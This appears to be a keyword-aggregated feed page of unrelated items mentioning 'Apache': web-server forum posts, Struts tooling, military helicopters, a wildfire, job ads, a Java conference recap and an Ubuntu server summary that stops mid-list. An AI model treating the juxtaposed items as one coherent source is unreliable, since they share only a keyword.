Setting up notifications on the wiki was difficult, because apparently the wiki recognizes only its own hostname. Perhaps I misunderstood something, but for me, entering preferred addresses for each user did not work. I had to use username@my.host.name.com and set up a .forward file in each home folder. Definitely not something for the uninitiated.

 

In Conclusion

I will add more as I discover. Hope this was helpful.

 


          Comment on Bajaj Pulsar NS 160 vs TVS Apache RTR 160 by Bajaj Pulsar NS 160 Launch Date, Price, Mileage, Specifications, Images   
[…] Also See – Bajaj Pulsar NS 160 vs Pulsar NS 200 | Bajaj Pulsar NS 160 vs TVS Apache RTR 160 […]
          Comment on Bajaj Pulsar NS 160 vs TVS Apache RTR 160 by Compare Bajaj Pulsar NS 160 vs Pulsar NS 200 - Price, Mileage, Specs   
[…] Also See – Bajaj Pulsar NS 160 vs TVS Apache RTR 160 […]
          Comment on Bajaj Pulsar NS 160 Launch Soon! by Compare Bajaj Pulsar NS 160 vs TVS Apache RTR 160 - Price, Specs   
[…] first-ever 160cc motorcycle to go on sale under the Pulsar moniker. Also, from the looks of it, the NS 160 is targeted squarely at the TVS Apache RTR 160. The Apache offers a grunty motor, decent road handling […]
          Comment on 2017 TVS Apache RTR 160 – All You Need to Know! by Compare Bajaj Pulsar NS 160 vs TVS Apache RTR 160 - Price, Specs   
[…] go on sale under the Pulsar moniker. Also, from the looks of it, the NS 160 is targeted squarely at the TVS Apache RTR 160. The Apache offers a grunty motor, decent road handling and sharp looks. In comparison, the NS 160, […]
          Comment on List of Upcoming New Bajaj Pulsar Bikes In India by Compare Bajaj Pulsar NS 160 vs TVS Apache RTR 160 - Price, Specs   
[…] the all-new Bajaj Pulsar NS 160 is close to its launch and the upcoming Bajaj Pulsar model will soon become the first-ever 160cc motorcycle to go on sale under the Pulsar moniker. […]
          A military first: a high-power laser was mounted on a helicopter and used successfully against a target. How effective are today's laser weapons?   
In a combat test successfully completed by the US Army, a high-power laser mounted on an AH-64 Apache helicopter was used to attack an unmanned target (a vehicle). The target was located roughly one mile from the aircraft. It was the first time a fully integrated laser system aboard a rotary-wing aircraft was successfully employed against a target, according to Raytheon, the company that built the new laser weapon. The laser was tested at White Sands Missile Range in New Mexico, striking a target 1.4 kilometers away with great destructive force. These new laser weapons, worthy of science-fiction films, are silent and hard for an enemy to detect while in use, which is why they stand a good chance of reaching the battlefield in the near future. According to the manufacturer, the helicopter-mounted weapon can be used across a wide variety of flight regimes, altitudes and airspeeds. Laser systems have been fitted to Apache helicopters since 1984, when the type first entered service, but those were low-power devices used only for guidance [...]
          Web spaces in IIS   

Web spaces in IIS

Hi, good day. I hope someone can help me with this question. I currently have an Apache server on Ubuntu Server and a DNS on Windows Server 2007 with access via a hostname; likewise I have an IIS server running on Windows Server 2007 to which I have also given a name in the DNS. Everything is fine up to this point, since both work without any problem. The trouble I have is that on the Ubuntu server I can create web spaces for the u...

Published on October 16, 2016 by Loko

          Appearance when I call an ASP page from my IIS   

Appearance when I call an ASP page from my IIS

Hello:

I have the following problem: I have a Windows 2008 R2 Enterprise server with IIS installed with all the default options, which I use for my intranet. Whenever I call the hosted ASPX pages using the server's IP address, "http://172.16.5.20:8080/Bitacora" (I use port 8080 since 80 is reserved for Apache), they come out correctly; that is, the button styles, the rendering, the JavaScript slides, etc. all work correctly, ...

Published on July 3, 2015 by David

          IIS PHP SQL   

IIS PHP SQL

Reply to IIS PHP SQL

xve: The truth is that when I stopped WAMP, everything stopped, SQL included... It was logical to think that I should leave SQL running, or at least start SQL. Now my problem is that I cannot get IIS and SQL running at the same time; if I start IIS I cannot start SQL, and vice versa. I am starting to think that SQL-WAMP is not the right path for my purpose; I believe I should look for another alternative for SQL, something like a SQL manager (independent of PHP and Apache) for IIS 7. Although this option alr...

Published on May 7, 2012 by Alejandro

          IIS PHP SQL   

IIS PHP SQL

Reply to IIS PHP SQL

Alejandro, I take it that every time you say you stop WAMP (WAMP - DEACTIVATED), only Apache stops, right? MySQL keeps running, right?

Published on May 7, 2012 by xve

          Guard Recycles Aircrafts - Package   
The last AH-64A Apache attack helicopter left the Missouri National Guard to be refurbished into a newer digital model in early 2012.
          Comment on OA-X: US Senate panel approves US$1.2 billion for acquisition, by Felipe Morais   
I am rooting for the ST (Super Tucano) to win. But rationally, I think the Scorpion takes it without difficulty. I think the only point that favors the ST, considering the technical aspects, performance, politics, job creation and everything else involved in a contract of this kind, is the acquisition and operating price. "Ah, the trend is to cut costs." No doubt. But I see that trend, in the US case, as being about not running operations that demand an F-15 or F-22 for a Super Tucano's job, or deploying an Apache when a drone could easily carry out the mission and return to base without even being noticed. Now, in this case, where a genuinely American bird is competing against one produced under license, and where the only aspect favoring the latter is price, and not by that big a margin, I find it very hard for a rational decision to go to the ST.
          Service Unites! Annual Conference on Volunteerism   

Volunteer Tulsa presents….  The 7th Annual Conference on Volunteerism and Service November 7, 2014 8:30am-4:00pm Tulsa Community College, Northeast Campus 3727 East Apache Street Volunteer administrators, not-for-profit professionals, leaders in corporate social responsibility AND volunteers will come together to focus on uniting service. State Senator Rick Brinkley will share inspiring comments during the Conference opener, followed by a full day of workshops and celebrations. View the Registration Brochure for more details on expert faculty and sessions. Deadline for registering is October 31st.  Minimal fee required.  Register online @ http://www.volunteertulsa.org/special+events


          Controller:Struts   
This demonstration provides an overview of the Apache Struts page flow editor. The Struts page flow is opened by editing the struts-config.xml file directly or by using the Open Struts Page Flow context menu option on any project with the Struts technology scope enabled.

The page flow diagram provides a visual way of editing and documenting the page flow. Actions, page forward actions and data-bound pages are all represented as shapes on the diagram. Action forwards are shown as solid lines linking the action shapes, labeled with the name of the forward. Explicit links between pages, or between pages and actions, are shown as dashed lines. Form-bean usage is indicated by an overlay icon. The diagram provides several aids for visualizing and navigating around large page flows, as well as various tools to help with the layout of the flow. You can also customize colors and fonts and add notes to the diagram.

The source view gives you access to the Struts XML configuration file. The XML view is synchronized with the diagram view, and you can edit the Struts definition in either mode. The XML view provides code insight and syntax highlighting to reduce the chances of manual coding errors, and changes are validated against the Struts DTD.

Along with the diagram and XML views, the JDeveloper property inspector can be used to edit the Struts metadata. Values can be edited directly in the property inspector, which is also synchronized with the underlying XML. Lists of values are shown for properties such as the form-bean name or page names. You can also categorize the property list to make it simpler to locate the attributes you need to change.

Finally, the structure pane provides an alternative view of the configuration's structure and a useful way to navigate to the non-visual Struts elements. You can also create new Struts elements in the structure pane. Visual elements can be created directly in the diagram using the component palette. The diagram can be used as an application workbench, allowing drill-down into code or the visual page editor as appropriate for the node type. You can also create a form bean from here if needed; all the common superclasses are listed for your convenience.
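For orientation, here is a skeletal struts-config.xml of the kind the diagram renders (the element names follow the Struts 1 DTD; the paths and class names are illustrative, not from the demo):

    <struts-config>
      <form-beans>
        <!-- a form-bean; its usage on an action is shown as an overlay icon -->
        <form-bean name="loginForm" type="com.example.LoginForm"/>
      </form-beans>
      <action-mappings>
        <!-- an action shape on the diagram; its forwards are the solid lines -->
        <action path="/login" type="com.example.LoginAction" name="loginForm">
          <forward name="success" path="/welcome.jsp"/>
          <forward name="failure" path="/login.jsp"/>
        </action>
      </action-mappings>
    </struts-config>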
          Tiffany Fire -Socorro County – 6/29 7:15 p.m.   
The Tiffany Fire is 40% contained and estimated at 7,000 acres. The fire has burned into the Bosque del Apache and is threatening at least one railroad bridge.  No other structures are at risk at this time. Temperatures remain in the upper 90’s with relative humidity at 7%. The salt cedar will continue to create […]
          Java developer   
Java developer - Web development

With a minimum of 3 years of experience working in a software development role, the selected candidate is expected to have strong programming skills in Java (or similar) and to be well versed in object-oriented design and development. He/she will also be expected to have a solid understanding of distributed concurrent systems and an understanding of service-oriented architectures. Knowledge of systems-level programming, databases and ORM, and web delivery technologies such as Java Servlets will be considered an asset. You are expected to have a passion for programming and a willingness to learn new technologies and techniques. You take pride in delivering elegant solutions, strive for excellence, yet are capable of meeting strict deadlines. You enjoy working in a team of like-minded individuals but can be trusted to work independently when required.
 
Key Job Responsibilities:
·       Conducts research and technology exploration as required to address any present or future projects.
·       Participates in analysis and design activities so as to produce a viable system design that fits within the overall system architecture whilst addressing all the elicited requirements.
·       Follows established development and testing procedures so as to ensure quality software development which meets the requirements whilst adhering to the proposed design and any stipulated timelines.
·       Creates and maintains documentation regarding systems being developed in order to ensure long-term maintainability.
·       Makes use of company standard source control and defect/task tracking software so as to effectively handle configuration management and defect fixing issues.
 
Skills Required:
·       Possess a university degree in computer science or engineering or equivalent.
·       Knowledge of Java SE.
·       Previous work experience or knowledge of agile methodologies like Scrum or Kanban.
·       Knowledge of web technologies (HTML, Javascript, JQuery).
·       Experience with Java enterprise technologies such as the Spring Framework (core, MVC, integration, ORM), JMS (ActiveMQ), Hibernate ORM, Servlet Containers (Apache Tomcat).
·       Knowledge of databases (MySQL preferred), and NoSQL systems (MongoDB preferred).
·       Proficient with the use of Linux.
·       Experience with build automation tools (such as Maven), source control tools, and bug tracking software.
·       Experience with IDEs such as Eclipse.
·       Fluent in written and spoken English.
 

    Job type:
    Full-time
    Industry: Other

          Atrophic, fetid, chronic rhinitis (ozena) - causes, symptoms, treatment    

Atrophic, fetid, chronic rhinitis (ozena) is a condition that can be triggered by factors such as dust or air pollution. Ozena manifests itself through, for example, green or yellow crusts, a foul smell from the nose, chronic nasal discharge, and a weakened or lost sense of smell. Atrophy (wasting of the nasal mucosa) progresses in stages. Atrophic, chronic, fetid rhinitis is treated, among other ways, by moisturizing and cleansing the nasal cavity (sea water).


          Control panel   

Control panel

Reply to: How to uninstall an application that does not appear in the control panel

Hi xve, I managed to do it with CCleaner. But the installation of XAMPP 5.6.21 gives me errors, which I have posted in the Apache forum.

Published on June 11, 2016 by zendi

          Mississippi Guardsmen Support Aerial Operation   
An aircrew from Company A, 1st Battalion, 149th Aviation Regiment, is in Gulfport, Mississippi performing maintenance on AH-64 Apache Helicopters to support the 155th Armored Brigade Combat Team by participating in missions at Camp Shelby, Mississippi for an Exportable Combat Training Capability exercise. Produced by Pfc. Dharron Collins. Additional Video by Sgt. Tim Morgan and Spc. Jovi Prevot. Interviews with Sgt. Casey D. Hopkins and Staff Sgt. Clayton L. Yielding. Also available in high definition.
          KANJAVA PARTY 2017 Held: A Roundup of the Presentation Materials #kanjava #KanJavaParty   

kanjava.connpass.com

We held "KANJAVA PARTY 2017," the largest-ever event of the Kansai Java Engineers' Group (KanJava), of which I am the representative, and brought it to a successful close!

This event included some firsts for KanJava:

  • Our first multi-track program
  • Our first event at the 100-person scale

At the planning stage we worried whether 100 people would even sign up, but within a few days of opening registration the applications passed 100 and a waiting list formed. While asking people whose plans had changed to please cancel, we still welcomed more than 100 attendees on the day.

With that many people, the workload for reception, after-party preparation and so on becomes substantial, and I had my worries. I mostly just sat and did a little emceeing, while the other staff members acted autonomously and genuinely carried out the behind-the-scenes work. That, I believe, is exactly why there was no trouble.

The after-party had almost no cancellations, with everyone paying the fee, and the pizza, which we had actually over-ordered for the expected headcount, disappeared in no time; a happy problem to have.

My thanks go to everyone who was involved.

This time the staff even made T-shirts!

Session materials (to be updated as publication is confirmed)

Opening remarks: "KanJava and Java" by Jyukutyo (@jyukutyo), president of the Kansai Java Engineers' Group

These are my opening slides, with the housekeeping slides removed. I spoke about the history of KanJava and the aims of KANJAVA PARTY.

KANJAVA PARTY 2017 opening remarks from Koichi Sakata
www.slideshare.net

B1: "What Spring Security Can and Cannot Do" by opengl_8080

qiita.com

A2: "Everyday DDD" by haljik

speakerdeck.com

B2: "A Taste of JUnit 5" by Eiji Yamane

speakerdeck.com

A3: "Introduction to JShell: Official REPL Tool for Java Platform" by Shinya Yoshida (@shinyafox)

The content was the same as his Java Day Tokyo 2017 session, so these are the slides from that event.

Introduction to JShell #JavaDayTokyo #jdt_jshell from bitter_fox
www.slideshare.net

B3: "First Steps in Stream Processing: Akka Streams and RxJava" by Sasaki Nishikawa

speakerdeck.com

A4: "Building an Event-Centric Application with Kafka, on Spring Cloud" by Mitsuyuki Shiiba (@bufferings)

bufferings.hatenablog.com

B4: "What We Saw from Taking On a Microservices Architecture" by Yoshitaka Fujii

speakerdeck.com

A5: "Crossing Over from DevLOVE Kansai to Guild Works (working title)" by Yoh Nakamura (@yohhatu)

speakerdeck.com

B5: "Kansai Java Girls' Club Short Session Showcase" by the Kansai Java Girls' Club (Asami Abe (Kinoko) and three others)

speakerdeck.com

A6: "Applicable to Offshore Development Too!? The Remote Team Toolbox" by Daisuke Kasuya (@daiksy)

speakerdeck.com

B6: "On Introducing Kotlin to the Hatena Bookmark Android App" by Takuji Nishibayashi (takuji31)

speakerdeck.com

LT (Lightning Talks)

This Is the Real Headline Feature of JDK 9! from Hiroyuki Ohnaka
www.slideshare.net

docs.google.com

speakerdeck.com

speakerdeck.com


          Attending JJUG CCC 2017 Spring and Speaking in a Sponsor Session #jjug_ccc   

スポンサーセッション

今まで3回CCCではセッションをCfPを出して担当しました。私が所属するフリュー株式会社は、前回2016 Fallからスポンサーになっています。今回は僕がスポンサーセッションを担当しました。

ですが、スポンサーだからといって何を宣伝するわけでもなく、純粋な意味でCCCにふさわしいセッションをすることを心がけました。

スライドはこちらです。

JJUG CCC 2017 Spring Seasar2からSpringへ移行した俺たちのアプリケーションがマイクロサービスアーキテクチャへ歩み始めた from Koichi Sakata
www.slideshare.net

悪いセッションではなかったようで、よかったです。

f:id:jyukutyo:20170523154733p:plain

参加セッション

  • JHipsterで学ぶ!Springによるサーバサイド開発手法
  • Java Clientで入門するApache Kafka
  • データ履歴管理のためのテンポラルデータモデルとReladomoの紹介
  • Polyglot on the JVM with Graal
  • Seasar2からSpringへ移行した俺たちのアプリケーションがマイクロサービスアーキテクチャへ歩み始めた(スピーカー)
  • (自分のセッションが終わったので脱力)
  • ハックで生きる:オープンソースで会社を興すには

JHipsterもReladomoも気になりましたね!Kafkaはアーキテクチャ内にはあるのですが、僕は全然詳しくなくてここで初歩を学べてよかったです。DevoxxUSでKafkaのセッション出て何かよくわかっていなかったので。

“ハックで生きる"はfather of Jenkinsである川口さんのセッションです。川口さんのセッションは何度か聴いていますが、いつもこうウィットに富んだトークで楽しいです。会社を興すという点では僕に直接的に何かあるわけではないですが、川口さんの話を日本(語)で聴けることが貴重です。

Polyglot on the JVM with Graal

最近Graalと聞けば飛びついています。Graal自体に知的好奇心が刺激されているのに加えて、まずは簡易なオレオレJVM言語を作りたくて、それにGraalとTruffle、ANTLRを使おうと考えています。vJUGのOlegさんがこれをやっているので、自分でもやってみたいと。あ、これ次回CCCのネタにできるな。

大規模カンファレンスとしてのJJUG CCC

まずは幹事、ボランティアのみなさん、お疲れさまでした&ありがとうございました!僕も小さいながらコミュニティを運営する身、参加者が当日1,000人を超えるイベントの運営は想像を絶します。海外Javaエンジニアから聞きましたが、1,000人規模のボランティアベースのイベントなど存在しないそうです。

That said, as the JJUG president noted at the annual general meeting, the staff are already at the limits of this scale. So what can I do? Honestly, joining the staff and losing the chance to see the sessions I like would be a bit painful. I can keep speaking as I have been, but that doesn't shoulder any of the operational burden. Of course, if there were an admission fee or a way to donate, I would gladly pay; I can't promise much, but 10,000 or 20,000 yen or so. For now, the next event will be at the same venue, Bellesalle Shinjuku Grand, so at the very least I want to keep a cooperative stance and avoid getting in the organizers' way.


          Aircraft Powertrain Repairer, Long Version   
A 1st CAB aircraft powertrain repairer conducts fluorescent penetrant and 50-hour borescope inspections on a U.S. Army AH-64D Apache helicopter.
          Apache Mechanic - Package, Long Version   
The 4th Combat Aviation Brigade Apache unit has saved hundreds of lives during the unit's deployment so far. People often focus on the pilots who accomplish these missions, but it is the mechanics who keep the birds running smoothly. Air Force Sgt. Joshua Peargin takes us to Mazar-e-Sharif, where one mechanic tells us about the impact they have made so far. Also available in high definition.
          PHP Developer - TORRA INTERNATIONAL - Malappuram, Kerala   
Maintain and manage the general network setup. Configure and maintain the Apache and PHP programming environment.... ₹15,000 a month
From Indeed - Tue, 04 Apr 2017 03:57:40 GMT - View all Malappuram, Kerala jobs
          Comment on ProxyPass Exclude Directory/Path under Apache by Gagan   
It works with directories as well. The placement of the exclusion rule is the key: you need to declare the paths and files to be excluded before the actual ProxyPass mapping happens.
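
For illustration, a minimal httpd configuration sketch of that ordering (the paths and backend address here are assumptions, not taken from the article):

```apache
# Exclusions must come BEFORE the general rule: ProxyPass directives
# are checked in configuration order, and the first match wins.
ProxyPass /static !
ProxyPass /files/report.pdf !
ProxyPass / http://127.0.0.1:8080/
ProxyPassReverse / http://127.0.0.1:8080/
```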
          Comment on ProxyPass Exclude Directory/Path under Apache by asdf   
Doesn't work with directories, only files.
          (USA-AZ-Fort Huachuca) Web Systems Administrator   
**Web Systems Administrator**
**Requisition ID: 17015332**
**Location(s): United States-Arizona-Fort Huachuca**
**US Citizenship Required for this Position: Yes**
**Relocation Assistance: No relocation assistance available**
**Travel: No**

Are you looking for a rewarding and challenging career as a Web Server Administrator with one of the nation's leading defense contractors? If so, then Northrop Grumman may be the employer for you!

Northrop Grumman is seeking a motivated professional to join our team. This position is located at Fort Huachuca, AZ.

The Web Server Administrator is the primary systems administrator for a software engineering shop that develops web applications in ASP.NET C# with MVC. We are a primarily Microsoft Windows environment. The web administrator will be the POC for and manage the code and documentation of all web servers. The candidate will also be the primary POC for establishing new FQDNs, verifying and testing certificates, maintaining Single Sign-On, and maintaining/troubleshooting web applications as needed.

Basic Qualifications:
1. Must possess a Bachelor's degree and a minimum of 6 years of experience in Windows administration. Note: additional experience may be considered in lieu of the degree requirement (minimum of 10 years combined between education and relevant experience); additional experience can include programming.
2. Must possess experience managing multiple web sites and applications, in a primarily Windows server environment.
3. Must be experienced with Microsoft Server, IIS 7.x/8.x, and MS SQL 2012 or higher. Configuring new web applications in IIS and installing and maintaining SSL certificates are a plus.
4. Must have familiarity with programming methodologies.
5. Must have experience troubleshooting web applications and web servers.
6. Must possess Security certification (or higher).
7. Must possess Windows operating system environment certification (Server 2008 or Server 2012), or be able to achieve it within 6 months from hire.
8. Must possess/obtain a Top Secret clearance with SCI eligibility. Note: an Interim Secret is a minimum to start.
9. Must have familiarity with at least one coding language.
10. Must be a U.S. Citizen.

Preferred Qualifications:
1. Experience with Linux Red Hat web environments, running web applications on Apache/Tomcat, in addition to Windows administration.
2. Familiarity with SiteMinder and Single Sign-On using AKO or EAMS-A/GCDS.
3. Familiarity with U.S. Army policies and procedures, STIGs, and IAVAs.
4. Ability to debug web applications in C#.
5. Familiarity with object-oriented programming.

Northrop Grumman is committed to hiring and retaining a diverse workforce. We are proud to be an Equal Opportunity/Affirmative Action Employer, making decisions without regard to race, color, religion, creed, sex, sexual orientation, gender identity, marital status, national origin, age, veteran status, disability, or any other protected class. For our complete EEO/AA and Pay Transparency statement, please visit www.northropgrumman.com/EEO. U.S. Citizenship is required for most positions.

**Title:** _Web Systems Administrator_
**Location:** _Arizona-Fort Huachuca_
**Requisition ID:** _17015332_
          (USA-VA-Springfield) Cyber Architect 5   
**Cyber Architect 5**
**Requisition ID: 17015298**
**Location(s): United States-Virginia-Springfield**
**US Citizenship Required for this Position: Yes**
**Relocation Assistance: No relocation assistance available**
**Travel: No**

Where technology and teamwork come together... Where will you find innovation and technology? Right here at Northrop Grumman Corporation. Join us on the edge… the cutting edge! Transform the future of technology… Find balance with a part-time opportunity... Realize the rewards of conquering a new challenge... Work with the technology you need to succeed...

Northrop Grumman is building our team supporting the data center infrastructure and middleware of U.S. Customs and Border Protection (CBP). CBP is one of the world's largest law enforcement organizations and is charged with keeping terrorists and their weapons out of the U.S. while facilitating lawful international travel and trade. On an annual basis, CBP welcomes nearly one million visitors, screens more than 67,000 cargo containers, arrests more than 1,100 individuals, and seizes nearly 6 tons of illicit drugs. Most team members will be located in Springfield, VA.

As a leader in information technology solutions, Northrop Grumman provides talented individuals with the opportunity to:
• Work with the latest tools and technologies
• Share experiences, insights, perspectives, and creative solutions with some of the best minds in the industry
• Connect with coworkers in a caring, diverse, and respectful environment
• Collaborate through integrated product teams, cross-functional teams, and employee resource groups

Responsibilities include: understand application requirements, design, and development, working with Development Operations, S/W development, and S/W architecture, and knowing how to anticipate the industry and business requirements that drive operations. The primary goal of Enterprise Web Services is to provide engineering and operational support for middleware technologies (e.g., XML, Web Services, MQ, DataPowers, and Service-Oriented Architecture), Web Services products (e.g., WebLogic, WebSphere, Apache Web Server, Tivoli Access Manager, and WebSEAL), and enterprise applications and technical projects based on customer requirements and mission needs, while ensuring 24x7x365 O&M support for its CBP mission-critical systems relating to MQ/Middleware Operations and Web Services Operations.

• Implement and resolve connectivity with trade partners and value added network (VAN) providers
• Provide data translation/transformation maps and resolve data translation/transformation mapping problems
• Track, maintain, and continuously improve upon system availability, system security, performance, and the overall health of Enterprise Web Systems
• Develop, operate, and maintain a capacity and performance management process to plan, implement, measure, and manage the capacity of the services to confirm that the levels of capacity consistently meet business requirements and objectives
• Design and support Web services products on Oracle WebLogic Server, IBM WebSphere Application Server, and any other Java container as designed by the customer
• Engineer, monitor, and maintain all functionality, certifications, and supported standards available from the Web Services products

Basic Qualifications:
• Bachelor's Degree in a related field and 14 years of experience
• Experience with Linux/UNIX/Windows operating systems
• Must have an active DHS TS Clearance and be able to obtain a DHS/CBP security clearance - US Citizenship required
• Must possess experience in system engineering in one or more areas including telecommunications concepts, computer languages, operating systems, database/DBMS, and middleware

Preferred Qualifications:
• Experience with all components across the CBP Database enterprise architecture

Northrop Grumman is committed to hiring and retaining a diverse workforce. We are proud to be an Equal Opportunity/Affirmative Action Employer, making decisions without regard to race, color, religion, creed, sex, sexual orientation, gender identity, marital status, national origin, age, veteran status, disability, or any other protected class. For our complete EEO/AA and Pay Transparency statement, please visit www.northropgrumman.com/EEO. U.S. Citizenship is required for most positions.

**Title:** _Cyber Architect 5_
**Location:** _Virginia-Springfield_
**Requisition ID:** _17015298_
          Ubuntu Insights: Ubuntu Server Development Summary – 30 Jun 2017   

Hello Ubuntu Server!

The purpose of this communication is to provide a status update and highlights of interesting developments from the Ubuntu Server Team. If you would like to reach the server team, you can find us in the #ubuntu-server channel on Freenode. Alternatively, you can sign up for and use the Ubuntu Server Team mailing list.

cloud-init and curtin

cloud-init

  • Completed two SRU submissions this week:
    • Initial support for SR-IOV public preview instances on Azure
    • Fix apt-get race conditions at startup on AWS
  • Fix NTP integration tests on Artful

curtin

  • Completed SRU submission (LP: #1697545)

DPDK

  • New Debian upload
  • Guiding new contributors around backports and uploads into Debian & Ubuntu
  • Enhancements to uvtool for better arm64 testing
  • Prepping CI testing on 17.05.x branch

Ubuntu Server Test

The Ubuntu Server team’s Jenkins instance is managed using Jenkins Job Builder. All these scripts and other test tools are now located under the Canonical Server Team’s GitHub page.

Bug Work and Triage

IRC Meeting

Ubuntu Server Packages

  • First review of pcp main inclusion request (MIR)
  • Fix strongswan import due to top-level pristine-tar/dsc branches
  • Updates to the server guide
    • Section on virtual functions and USB passthrough
    • Accessing qemu monitor via libvirt

Below is a summary of uploads to the development and supported releases. Current status of the Debian to Ubuntu merges is tracked on the Merge-o-Matic page. For a full list of recent merges with change logs please see the Ubuntu Server report.

Uploads to the Development Release (Artful)

cloud-init, 0.7.9-199-g4d9f24f5-0ubuntu1, smoser
cloud-init, 0.7.9-197-gebc9ecbc-0ubuntu1, smoser
exim4, 4.89-3ubuntu1, mdeslaur
freeipmi, 1.4.11-1.1ubuntu4, dannf
libcommons-cli-java, 1.4-1, None
libvirt, 2.5.0-3ubuntu10, corey.bryant
libyaml, 0.1.7-2ubuntu2, costamagnagianfranco
libyaml, 0.1.7-2ubuntu1, costamagnagianfranco
lxd, 2.15-0ubuntu3, stgraber
lxd, 2.15-0ubuntu2, stgraber
lxd, 2.15-0ubuntu